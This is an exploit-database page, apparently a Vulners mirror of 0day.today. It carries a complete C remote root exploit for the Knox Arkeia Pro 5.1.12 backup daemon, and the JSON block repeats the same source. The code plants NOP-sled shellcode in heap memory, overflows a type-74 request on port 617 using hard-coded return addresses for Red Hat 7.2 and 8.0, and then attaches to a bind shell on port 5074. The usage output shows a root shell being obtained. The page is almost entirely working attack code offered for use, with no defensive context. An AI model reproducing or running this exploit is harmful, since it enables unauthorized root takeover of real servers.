Search...

Knox Arkeia Pro 5.1.12 Backup Remote Root Exploit

2003-09-20T00:00:00

ID 1337DAY-ID-8349
Type zdt
Reporter n/a
Modified 2003-09-20T00:00:00

Description

Exploit for linux platform in category remote exploits

                                        
                                            =================================================
Knox Arkeia Pro 5.1.12 Backup Remote Root Exploit
=================================================

/*
 * Knox Arkiea arkiead local/remote root exploit.
 *
 * Portbind 5074 shellcode
 *
 * Tested on Redhat 8.0, Redhat 7.2, but all versions are presumed vulnerable.
 * 
 * NULLs out least significant byte of EBP to pull EIP out of overflow buffer.
 * A previous request forces a large allocation of NOP's + shellcode in heap
 * memory.  Find additional targets by searching the heap for NOP's after a 
 * crash.  safeaddr must point to any area of memory that is read/writable
 * and won't mess with program/shellcode flow. 
 *
 * ./ark_sink host targetnum 
 * [[email protected] dir]$ ./ark_sink 192.168.1.2 1
 * [*] Connected to 192.168.1.2:617
 * [*] Connected to 192.168.1.2:617
 * [*] Sending nops+shellcode
 * [*] Done, sleeping
 * [*] Sending overflow
 * [*] Done
 * [*] Sleeping and connecting remote shell
 * [*] Connected to 192.168.1.2:5074
 * [*] Success, enjoy
 * id
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
 *
 *
 */


#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;netdb.h&gt;
#include &lt;sys/socket.h&gt;
#include &lt;sys/errno.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;netinet/in.h&gt;
#include &lt;arpa/nameser.h&gt;


#define BUFLEN		10000		/* for getshell()  		*/
#define LEN 		280		/* overflow packet data section    */
#define HEAD_LEN 	8		               /*  overflow packet header	*/
#define NOP_LEN		10000		/* nop+shellcode packet 	*/
#define ARK_PORT	617
#define SHELL_PORT	5074
#define NOP 		0x90
#define NUMTARGS	2

struct {
	char 		*os;
	unsigned int	targret;
	unsigned int	targsafe;
} targets[] = {
	{ "Redhat 8.0", 0x80ecf90, 0x080eb940 },
	{ "Redhat 7.2", 0x80eddc0, 0x080eb940 },
	NULL
};


/* portbind 5074 */
const char shellcode[] = 
"\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08"
"\x8d\x4d\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14"
"\x66\xc7\x45\x16\x13\xd2\x31\xd2\x89\x55\x18\x8d\x55\x14"
"\x89\x55\x0c\xc6\x45\x10\x10\xb0\x66\xcd\x80\x40\x89\x45\x0c"
"\x43\x43\xb0\x66\xcd\x80\x43\x89\x45\x0c\x89\x45\x10\xb0\x66"
"\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41\x80\xf9\x03"
"\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"
"\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

unsigned int resolve(char *hostname)
{
	u_long 	ip = 0;
	struct hostent	*hoste;

	if ((int)(ip = inet_addr(hostname)) == -1)
	{
		if ((hoste = gethostbyname(hostname)) == NULL)
		{
			herror("[!] gethostbyname");
			exit(-1);
		}
		memcpy(&ip, hoste-&gt;h_addr, hoste-&gt;h_length);
	}
	return(ip);
}


int isock(char *hostname, int portnum)
{
	struct sockaddr_in	sock_a;
	int			num, sock;
	unsigned int		ip;
	fd_set			input;

	sock_a.sin_family = AF_INET;
	sock_a.sin_port = htons(portnum);
	sock_a.sin_addr.s_addr = resolve(hostname);

	if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) &lt; 0)
	{
		herror("[!] accept");
		exit(-1);
	}
	
	if (connect(sock, (struct sockaddr *)&sock_a, sizeof(sock_a)))
	{
		herror("[!] connect");
		exit(-1);
	}
	
	fprintf(stderr, "[*] Connected to %s:%d\n", hostname, portnum);
	return(sock);
	
}

int getshell(int sock)
{

	char	buf[BUFLEN];
	int	nread=0;

  	while(1) 
	{ 
    		fd_set input; 
    		FD_SET(0,&input); 
    		FD_SET(sock,&input); 
    		select(sock+1,&input,NULL,NULL,NULL); 
    	
		if(FD_ISSET(sock,&input)) 
		{ 
      			nread=read(sock,buf,BUFLEN); 
      			write(1,buf,nread); 
     		} 
     		if(FD_ISSET(0,&input)) 
     			write(sock,buf,read(0,buf,BUFLEN)); 
  	} 
}

int usage(char *progname)
{
	int 	i;

	fprintf(stderr, "Usage:\n./%s hostname target_num\n");
	for (i = 0; targets[i].os; i++)
		fprintf(stderr, "Target %d: %s\n", i+1, targets[i].os);
	exit(-1);
}

int main( int argc, char **argv)
{

	/* first 2 bytes are a type 74 request */
	/* last two bytes length */
	char 		head[] = "\x00\x4a\x00\x03\x00\x01\xff\xff";
	char 		data[512];
	char		sc_req[20000];
	char		*host;
	unsigned int		tnum;
	unsigned int 	safeaddr;
	unsigned int 	ret;
	int		datalen		= LEN;
	int		port		= ARK_PORT;
	unsigned int	addr		= 0;
	int		sock_overflow, sock_nops, sock_shell;
	int 		i;

	if (argc == 3)
	{
		host = argv[1];
		tnum = atoi(argv[2]);
		if (tnum &gt; NUMTARGS || tnum == 0)
		{
			fprintf(stderr, "[!] Invalid target\n");
			usage(argv[0]);
		}
	}
	else
	{
		usage(argv[0]);
	}
	
	tnum--;
	ret = targets[tnum].targret;
	safeaddr = targets[tnum].targsafe;

	sock_overflow = sock_nops = sock_shell = 0;
	sock_nops = isock(host, port);
	sock_overflow = isock(host, port);

	// build data section of overflow packet
	memset(data, 0x90, datalen);
	for (i = 0; i &lt; datalen; i += 4)
		memcpy(data+i, (char *)&ret, 4);
	// we overwrite a pointer that must be a valid address
	memcpy(data+datalen-12, (char *)&safeaddr, 4); 

	// build header of overflow packet
	datalen = ntohs(datalen);
	memcpy(head+6, (char *)&datalen, 2);

	// build invalid packet with nops+shellcode
	memset(sc_req, 0x90, NOP_LEN+1);
	memcpy(sc_req+NOP_LEN, shellcode, sizeof(shellcode));

	// send invalid nop+shellcode packet
	fprintf(stderr, "[*] Sending nops+shellcode\n");
	write(sock_nops, sc_req, NOP_LEN+sizeof(shellcode)); 
	fprintf(stderr, "[*] Done, sleeping\n");
	sleep(1);
	close(sock_nops);

	// send overflow
	fprintf(stderr, "[*] Sending overflow\n");
	write(sock_overflow, head, HEAD_LEN);
	write(sock_overflow, data, LEN);
	fprintf(stderr, "[*] Done\n");
	fprintf(stderr, "[*] Sleeping and connecting remote shell\n");
	sleep (1);
	close(sock_overflow);

	// connect to shell
	sock_shell = isock(host, SHELL_PORT);
	fprintf(stderr, "[*] Success, enjoy\n");
	getshell(sock_shell);

}


 

#  0day.today [2018-02-05]  #

JSON Vulners Source

Initial Source

{"published": "2003-09-20T00:00:00", "id": "1337DAY-ID-8349", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for linux platform in category remote exploits", "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2018-02-05T03:13:47", "rev": 2}, "dependencies": {"references": [], "modified": "2018-02-05T03:13:47", "rev": 2}, "vulnersScore": 0.7}, "type": "zdt", "lastseen": "2018-02-05T03:13:47", "edition": 2, "title": "Knox Arkeia Pro 5.1.12 Backup Remote Root Exploit", "href": "https://0day.today/exploit/description/8349", "modified": "2003-09-20T00:00:00", "bulletinFamily": "exploit", "viewCount": 2, "cvelist": [], "sourceHref": "https://0day.today/exploit/8349", "references": [], "reporter": "n/a", "sourceData": "=================================================\r\nKnox Arkeia Pro 5.1.12 Backup Remote Root Exploit\r\n=================================================\r\n\r\n/*\r\n * Knox Arkiea arkiead local/remote root exploit.\r\n *\r\n * Portbind 5074 shellcode\r\n *\r\n * Tested on Redhat 8.0, Redhat 7.2, but all versions are presumed vulnerable.\r\n * \r\n * NULLs out least significant byte of EBP to pull EIP out of overflow buffer.\r\n * A previous request forces a large allocation of NOP's + shellcode in heap\r\n * memory. Find additional targets by searching the heap for NOP's after a \r\n * crash. safeaddr must point to any area of memory that is read/writable\r\n * and won't mess with program/shellcode flow. \r\n *\r\n * ./ark_sink host targetnum \r\n * [[email\u00a0protected] dir]$ ./ark_sink 192.168.1.2 1\r\n * [*] Connected to 192.168.1.2:617\r\n * [*] Connected to 192.168.1.2:617\r\n * [*] Sending nops+shellcode\r\n * [*] Done, sleeping\r\n * [*] Sending overflow\r\n * [*] Done\r\n * [*] Sleeping and connecting remote shell\r\n * [*] Connected to 192.168.1.2:5074\r\n * [*] Success, enjoy\r\n * id\r\n * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)\r\n *\r\n *\r\n */\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netdb.h>\r\n#include <sys/socket.h>\r\n#include <sys/errno.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <arpa/nameser.h>\r\n\r\n\r\n#define BUFLEN\t\t10000\t\t/* for getshell() \t\t*/\r\n#define LEN \t\t280\t\t/* overflow packet data section */\r\n#define HEAD_LEN \t8\t\t /* overflow packet header\t*/\r\n#define NOP_LEN\t\t10000\t\t/* nop+shellcode packet \t*/\r\n#define ARK_PORT\t617\r\n#define SHELL_PORT\t5074\r\n#define NOP \t\t0x90\r\n#define NUMTARGS\t2\r\n\r\nstruct {\r\n\tchar \t\t*os;\r\n\tunsigned int\ttargret;\r\n\tunsigned int\ttargsafe;\r\n} targets[] = {\r\n\t{ \"Redhat 8.0\", 0x80ecf90, 0x080eb940 },\r\n\t{ \"Redhat 7.2\", 0x80eddc0, 0x080eb940 },\r\n\tNULL\r\n};\r\n\r\n\r\n/* portbind 5074 */\r\nconst char shellcode[] = \r\n\"\\x89\\xc3\\xb0\\x02\\xcd\\x80\\x38\\xc3\\x74\\x05\\x8d\\x43\\x01\\xcd\\x80\"\r\n\"\\x31\\xc0\\x89\\x45\\x10\\x40\\x89\\xc3\\x89\\x45\\x0c\\x40\\x89\\x45\\x08\"\r\n\"\\x8d\\x4d\\x08\\xb0\\x66\\xcd\\x80\\x89\\x45\\x08\\x43\\x66\\x89\\x5d\\x14\"\r\n\"\\x66\\xc7\\x45\\x16\\x13\\xd2\\x31\\xd2\\x89\\x55\\x18\\x8d\\x55\\x14\"\r\n\"\\x89\\x55\\x0c\\xc6\\x45\\x10\\x10\\xb0\\x66\\xcd\\x80\\x40\\x89\\x45\\x0c\"\r\n\"\\x43\\x43\\xb0\\x66\\xcd\\x80\\x43\\x89\\x45\\x0c\\x89\\x45\\x10\\xb0\\x66\"\r\n\"\\xcd\\x80\\x89\\xc3\\x31\\xc9\\xb0\\x3f\\xcd\\x80\\x41\\x80\\xf9\\x03\"\r\n\"\\x75\\xf6\\x31\\xd2\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\"\r\n\"\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\";\r\n\r\nunsigned int resolve(char *hostname)\r\n{\r\n\tu_long \tip = 0;\r\n\tstruct hostent\t*hoste;\r\n\r\n\tif ((int)(ip = inet_addr(hostname)) == -1)\r\n\t{\r\n\t\tif ((hoste = gethostbyname(hostname)) == NULL)\r\n\t\t{\r\n\t\t\therror(\"[!] gethostbyname\");\r\n\t\t\texit(-1);\r\n\t\t}\r\n\t\tmemcpy(&ip, hoste->h_addr, hoste->h_length);\r\n\t}\r\n\treturn(ip);\r\n}\r\n\r\n\r\nint isock(char *hostname, int portnum)\r\n{\r\n\tstruct sockaddr_in\tsock_a;\r\n\tint\t\t\tnum, sock;\r\n\tunsigned int\t\tip;\r\n\tfd_set\t\t\tinput;\r\n\r\n\tsock_a.sin_family = AF_INET;\r\n\tsock_a.sin_port = htons(portnum);\r\n\tsock_a.sin_addr.s_addr = resolve(hostname);\r\n\r\n\tif ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)\r\n\t{\r\n\t\therror(\"[!] accept\");\r\n\t\texit(-1);\r\n\t}\r\n\t\r\n\tif (connect(sock, (struct sockaddr *)&sock_a, sizeof(sock_a)))\r\n\t{\r\n\t\therror(\"[!] connect\");\r\n\t\texit(-1);\r\n\t}\r\n\t\r\n\tfprintf(stderr, \"[*] Connected to %s:%d\\n\", hostname, portnum);\r\n\treturn(sock);\r\n\t\r\n}\r\n\r\nint getshell(int sock)\r\n{\r\n\r\n\tchar\tbuf[BUFLEN];\r\n\tint\tnread=0;\r\n\r\n \twhile(1) \r\n\t{ \r\n \t\tfd_set input; \r\n \t\tFD_SET(0,&input); \r\n \t\tFD_SET(sock,&input); \r\n \t\tselect(sock+1,&input,NULL,NULL,NULL); \r\n \t\r\n\t\tif(FD_ISSET(sock,&input)) \r\n\t\t{ \r\n \t\t\tnread=read(sock,buf,BUFLEN); \r\n \t\t\twrite(1,buf,nread); \r\n \t\t} \r\n \t\tif(FD_ISSET(0,&input)) \r\n \t\t\twrite(sock,buf,read(0,buf,BUFLEN)); \r\n \t} \r\n}\r\n\r\nint usage(char *progname)\r\n{\r\n\tint \ti;\r\n\r\n\tfprintf(stderr, \"Usage:\\n./%s hostname target_num\\n\");\r\n\tfor (i = 0; targets[i].os; i++)\r\n\t\tfprintf(stderr, \"Target %d: %s\\n\", i+1, targets[i].os);\r\n\texit(-1);\r\n}\r\n\r\nint main( int argc, char **argv)\r\n{\r\n\r\n\t/* first 2 bytes are a type 74 request */\r\n\t/* last two bytes length */\r\n\tchar \t\thead[] = \"\\x00\\x4a\\x00\\x03\\x00\\x01\\xff\\xff\";\r\n\tchar \t\tdata[512];\r\n\tchar\t\tsc_req[20000];\r\n\tchar\t\t*host;\r\n\tunsigned int\t\ttnum;\r\n\tunsigned int \tsafeaddr;\r\n\tunsigned int \tret;\r\n\tint\t\tdatalen\t\t= LEN;\r\n\tint\t\tport\t\t= ARK_PORT;\r\n\tunsigned int\taddr\t\t= 0;\r\n\tint\t\tsock_overflow, sock_nops, sock_shell;\r\n\tint \t\ti;\r\n\r\n\tif (argc == 3)\r\n\t{\r\n\t\thost = argv[1];\r\n\t\ttnum = atoi(argv[2]);\r\n\t\tif (tnum > NUMTARGS || tnum == 0)\r\n\t\t{\r\n\t\t\tfprintf(stderr, \"[!] Invalid target\\n\");\r\n\t\t\tusage(argv[0]);\r\n\t\t}\r\n\t}\r\n\telse\r\n\t{\r\n\t\tusage(argv[0]);\r\n\t}\r\n\t\r\n\ttnum--;\r\n\tret = targets[tnum].targret;\r\n\tsafeaddr = targets[tnum].targsafe;\r\n\r\n\tsock_overflow = sock_nops = sock_shell = 0;\r\n\tsock_nops = isock(host, port);\r\n\tsock_overflow = isock(host, port);\r\n\r\n\t// build data section of overflow packet\r\n\tmemset(data, 0x90, datalen);\r\n\tfor (i = 0; i < datalen; i += 4)\r\n\t\tmemcpy(data+i, (char *)&ret, 4);\r\n\t// we overwrite a pointer that must be a valid address\r\n\tmemcpy(data+datalen-12, (char *)&safeaddr, 4); \r\n\r\n\t// build header of overflow packet\r\n\tdatalen = ntohs(datalen);\r\n\tmemcpy(head+6, (char *)&datalen, 2);\r\n\r\n\t// build invalid packet with nops+shellcode\r\n\tmemset(sc_req, 0x90, NOP_LEN+1);\r\n\tmemcpy(sc_req+NOP_LEN, shellcode, sizeof(shellcode));\r\n\r\n\t// send invalid nop+shellcode packet\r\n\tfprintf(stderr, \"[*] Sending nops+shellcode\\n\");\r\n\twrite(sock_nops, sc_req, NOP_LEN+sizeof(shellcode)); \r\n\tfprintf(stderr, \"[*] Done, sleeping\\n\");\r\n\tsleep(1);\r\n\tclose(sock_nops);\r\n\r\n\t// send overflow\r\n\tfprintf(stderr, \"[*] Sending overflow\\n\");\r\n\twrite(sock_overflow, head, HEAD_LEN);\r\n\twrite(sock_overflow, data, LEN);\r\n\tfprintf(stderr, \"[*] Done\\n\");\r\n\tfprintf(stderr, \"[*] Sleeping and connecting remote shell\\n\");\r\n\tsleep (1);\r\n\tclose(sock_overflow);\r\n\r\n\t// connect to shell\r\n\tsock_shell = isock(host, SHELL_PORT);\r\n\tfprintf(stderr, \"[*] Success, enjoy\\n\");\r\n\tgetshell(sock_shell);\r\n\r\n}\r\n\r\n\r \n\n# 0day.today [2018-02-05] #"}